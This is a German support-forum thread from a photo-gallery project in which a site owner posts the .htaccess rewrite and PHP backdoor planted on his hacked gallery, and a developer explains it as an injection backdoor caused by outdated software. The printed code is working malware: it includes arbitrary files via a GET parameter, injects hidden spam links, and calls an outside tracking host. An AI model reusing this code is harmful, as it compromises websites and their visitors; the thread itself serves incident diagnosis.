gehackt? gehackt?
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

gehackt?

Started by kaiwahn, March 09, 2009, 09:50:37 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

kaiwahn

hallo Freunde

folgendes ist heute passiert, meine htaccess wurde von außen umgeschrieben, darauf hin hab ich mein Passwort geändert und die Datei wieder umgeschrieben, ca. eine halbe Stunde später wieder wurde diese Datei geändert.
Änderung:
RewriteEngine On
RewriteCond /customers/fotofreunde-oberhausen.de/fotofreunde-oberhausen.de/httpd.www/galerie/incladd.php -f RewriteCond %{REQUEST_URI} !incladd.php$ RewriteCond %{REQUEST_URI} !ebf0a660.php$ RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /galerie/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L] DirectoryIndex portal.php index.php

die beiden Dateien auf denen verwiesen wird, beinhalten folgenden Code:

<?php
error_reporting(0);

  if ( !function_exists('file_put_contents') && !defined('FILE_APPEND') ) {

   define('FILE_APPEND', 1);
   function file_put_contents($n, $d, $flag = false) {
       $mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';
       $f = @fopen($n, $mode);
       if ($f === false) {
           return 0;
       } else {
           if (is_array($d)) $d = implode($d);
           $bytes_written = fwrite($f, $d);
           fclose($f);
           return $bytes_written;
       }
   }
   


   }


if (!function_exists('file_get_contents')) {
      function file_get_contents($filename, $incpath = false, $resource_context = null)
      {
          if (false === $fh = fopen($filename, 'rb', $incpath)) {
              trigger_error('file_get_contents() failed to open stream: No such file or directory', E_USER_WARNING);
              return false;
          }

          clearstatcache();
          if ($fsize = @filesize($filename)) {
              $data = fread($fh, $fsize);
          } else {
              $data = '';
              while (!feof($fh)) {
                  $data .= fread($fh, 8192);
              }
          }

          fclose($fh);
          return $data;
      }
  }


   

function get_links_array() {
$links_array = array();

if (false === $f = @fopen('list.html', 'r')) return $links_array;

$fsize = filesize('list.html');
$request_uri = $_SERVER['REQUEST_URI'];
$seed_number = 0;
$request_uri_hash = md5($request_uri);
for ($i = 0; $i < strlen($request_uri_hash); $i++) { $seed_number += ord($request_uri_hash[$i]); } srand($seed_number); for ($i = 0; $i < 200; $i++) { fseek($f, rand(0, $fsize-200)); $tmp_line = trim(fgets($f)); if (!($line = trim(fgets($f)))) { $line = $tmp_line; }; @list($url, $title) = explode('|', $line); $links_array[] = '<a href="'.$url.'" title="'.$title.'">'.$title.'</a>';
}
fclose($f);
return $links_array;
};


function go_linkator($buffer) {
    global $links_array;
    $text_to_insert = "\n<div id='mlk' class='menu' style='position:absolute;top:-10000px;left:-10000px;'>".implode("\n<br>\n", $links_array)."</div>";   
    return (preg_replace("/(<body[^>]*>)/i", "\\1".$text_to_insert."<img height=\"1\" width=\"1\" alt=\"\" src=\"http://e1.extreme-dm.com/s10.g?login=nahuibly&j=n&jv=n\" />\n", $buffer));
   
};
//print "<!--  -->";
ob_start("go_linkator");
$links_array = get_links_array();

if (isset($_GET['file']))
{
    $incfile = $_GET['file'];
}
else
{
    $incfile = $_SERVER["REDIRECT_QUERY_STRING"];
    $incfile = preg_replace("/^[^\/]+/i", "", $incfile);
    $incfile = preg_replace("/^([^&]+)&.*/i", "\\1", $incfile); } chdir(dirname($incfile)); $file = basename($incfile); include($file); //print "<!--  -->";

ob_end_flush();

?>


und



<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
 
  ********************************************
  Coppermine version: 1.4.19
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/logs/log_header.inc.php $
  $Revision: 4392 $
  $Author: gaugau $
  $Date: 2008-04-16 09:25:35 +0200 (Mi, 16 Apr 2008) $ **********************************************/

if (!defined('IN_COPPERMINE')) {
        die();
}
?>
Garbage collection deleted ./albums/edit/preview_cf2a1039.jpg at March 9, 2009, 8:19 pm Garbage collection deleted ./albums/edit/mHTTP_temp_6d3d8d1c.jpg at March 9, 2009, 8:19 pm



hat da jemand eine Idee was dieses erreichen soll, werd nicht schlau daraus

Dank im Voraus

Kai

Joachim Müller

Du wurdest in der Tat gehackt. Der Code dient zum Einschleusen von beliebigem weiteren Code. Es ist sozusagen der universelle Nachschlüssel für Deine Seite.
Grund für den Hack ist die Tatsache, dass Du offensichtlich cpg1.4.19 einsetzt, obwohl wir derzeit bei cpg1.4.21 sind und alle Versionen vor dieser Version bekannte Sicherheitslücken aufweisen, auf die wir nachdrücklich hingewiesen haben.
Lies http://forum.coppermine-gallery.net/index.php/topic,51927.0.html für die weitere Vorgehensweise.

Samson1964

Meine Galerie (Version 1.4.18) wurde auch mal gehackt. Ich dachte, ich hätte alles entfernt, es wurde aber immer noch ein personalisierter Header eingefügt. Nach "extreme-dm" (was in der fertigen Seite steht) usw. suchte ich in den SQL-Sicherungen und in den Skripten vergeblich. Erst der Hinweis hier auf die .htaccess hat mich auf die Spur gebracht. Danke!